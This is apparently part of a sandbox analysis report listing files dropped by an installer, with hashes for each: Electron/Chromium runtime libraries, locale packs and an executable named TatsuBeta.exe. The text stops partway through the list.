SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\libGLESv2.dll

MD5 c146ad89dd786ea838682365038e1b20
SHA1 97dd4d57ff6ebf892fbcd7e6492dfb3e28e16aa8
SHA256 2a480f9371bbe6bffc812d9cc83cd6c7dfc39cc087f8c8645532f73593e7e5b2
SHA512 0a675a94c8b251207be87fd7280d633033d7a34f1a4117715a31424761903061c8e66c4ff45eef7bf839ff506d90460e4e0e989caecc169d4107c4a550303f62

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\snapshot_blob.bin

MD5 c9ab741bbef53fa0e84952b8891a5f5a
SHA1 e2dcb8d034e07243537c86371de0c52bce62cee1
SHA256 4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4
SHA512 177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\resources.pak

MD5 216314941aabbbb49e638d539729a721
SHA1 323010eb3c0030ca10e29de8965332b5900a2d16
SHA256 98af9ff2a20f0417d27b314a01022df508abb6d11267efd2d7f9286308b880bb
SHA512 ba086817534c47700503a64ff9825a5bb9e4fdb70c886938df21db6b15ef5a0f5b79038662c585705be37af0d1a1094a12cf4643e950cb9f2ecd198074f655e6

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\LICENSES.chromium.html

MD5 608db1ad79a4115c4b81d2aecf13da00
SHA1 dea43029831e306f6fe79434e9a62d01cfc15620
SHA256 77d7bb453e468238954eb2683e5b55a11b3c60aa9e67be8b6a78f3936c5eb603
SHA512 ab9364961812f79c74afd2a2cb2d4045b4bc6ce295bb1538b0ef0506f236e618f16bf76317441b6d0f970e4bb4cae805334ab147c83423dcd62e83e6ad4e8146

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\v8_context_snapshot.bin

MD5 75cd6112218cf1141b5dc29e82b645d5
SHA1 388bbb03647cdcd9a15751335c52975fa9a0f30e
SHA256 f32f3b9397d828d9a20c7ee90721f152254a9a35553586f1a757f132de39bae3
SHA512 4d9f8688f79255b430dc9defb96a7809a8418285e2f83d33f596a1bba5c5ef1e9dea0ca0fe82875ca711ccfc41de1049af14b9be158a6c1efaaf1513c33de5a0

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\TatsuBeta.exe

MD5 52aa4979a3faee70eca6fbfbed749f2b
SHA1 3c8d7b5124718b0f0620d347b86b8ad72a217c07
SHA256 682deec9c5d612ba5df5e600c7226ca699965f1c1999d2861a39f67a573e20df
SHA512 2d0cce6e2068346eefec4a89bcb5d63c8eec0202dd4d6eeb9fa18e5f90387a082b0d2cca52be75f47f15c34e069893aa63ba259691afad9641104a4e170679a8

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\vulkan-1.dll

MD5 815bb593b52bfbeb97ff77df9bb56cfa
SHA1 ef7ec10684ee8c628f6c2c5de18b08677d2ccc2d
SHA256 a2dfb40a2258d6fe58141f183d6a4531e055d54b3469180f14256b7abaaa544f
SHA512 ebf66ae657a22a6f205c8cd32fe65b088fdff2139a8668322b73f5587b6f8fb3713c937e38caa5f38eb9535089b30df2e50249bda68bf19bf625beb281786826

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\vk_swiftshader.dll

MD5 dc754816395e1ab3507d995d45ca441f
SHA1 98910a70ded78e80aba0c3ece0f745d5d1e5e030
SHA256 f1e63f1b922b1ae630576f61fdf68d0ec2cadbc1e044a5a305242562f9606753
SHA512 4f1b3826dbe3e02247ef110d9f96418f4915d1c931cc96d94a9c4f21203e1d8e0b2a28a18dc73dbe30531bad1b1428357113ae308b749b6906e903708e36e2fa

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\bn.pak

MD5 94ba426786b62f6fc3701e1956452c31
SHA1 67315944fcd7ebad230909c7421b233287acac52
SHA256 397d9133b414726678b719f64254d79a21efe2431290d2f128f8feb4515bb6a4
SHA512 2ea9e44dd11fcd52c11bafca143b461c581b3e97d1458d6d00b14ce068cc72dce8f26840ee1d389eeca128d294bf4fbe323480e4c26ef12983dd94303d27ca22

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\bg.pak

MD5 75ee3c0420d42a2c32c7c2ade4e5c4c0
SHA1 5566a811ae6fd9151a5ba38f98279ff045bf045a
SHA256 1d37c349dc8c88b1123b70e3424cb0ba463d34e910ae90a8a24e23dfc1353a0e
SHA512 dce693367fcc58ebfe1f3f7160e6edabe20d7e44d7c3a7e2d1627dea02be591bc6e017802562cf5e4817c0c7efa57e2700e2788e00202f3f705c7d1beffe66fa

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\ar.pak

MD5 1a1f556e221156e6983e836fdaaf620d
SHA1 fe4a9416c9fec17b879052ca0fd71adeb941e475
SHA256 76415b9a5d444295fb00769c3decebbce4b959d02cb501efb7fb5adebc135f08
SHA512 930a4001c655c887e0c85ba3e1d1f89f6674c951a36f46cb8233138a9ea19190fa2fcdcb61407cb24deafeff9af6f88fb2a508a408198c7c9ce5d14493fb8ab0

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\am.pak

MD5 55d3911b0aa4d8da019822e7e4b0e336
SHA1 4032bbfa8b445b4893a590451ecdd930582eed4f
SHA256 59959ceb41f80cc10b18d8a921f6de2bcc444f6d4ab570d95ebe6fa15cf211ea
SHA512 fa513fa28dd271840393819d3266ebfd77c2992065c383a44ff566a5aad288d00f53542fa27f023059d5a57a905818f7f559de3aea9bf810cf6bc45447fb707b

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\el.pak

MD5 38440b98bfdf5ed496da0f49d59534c0
SHA1 1498d9207ecaf4923a47271e24c68a817041c82e
SHA256 b1f78df8a7edc914357a2e90bc8dc0ac46f4df642bb22894569fe4905fb8ea0f
SHA512 95ba788fc2e1f07d54e398f1ec4d32c664cfb13118d46cb7af7a993367e032b10de84f3e604ab6e659d6410e2d736097ec5e9b3b002040c54412358f0ea10229

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
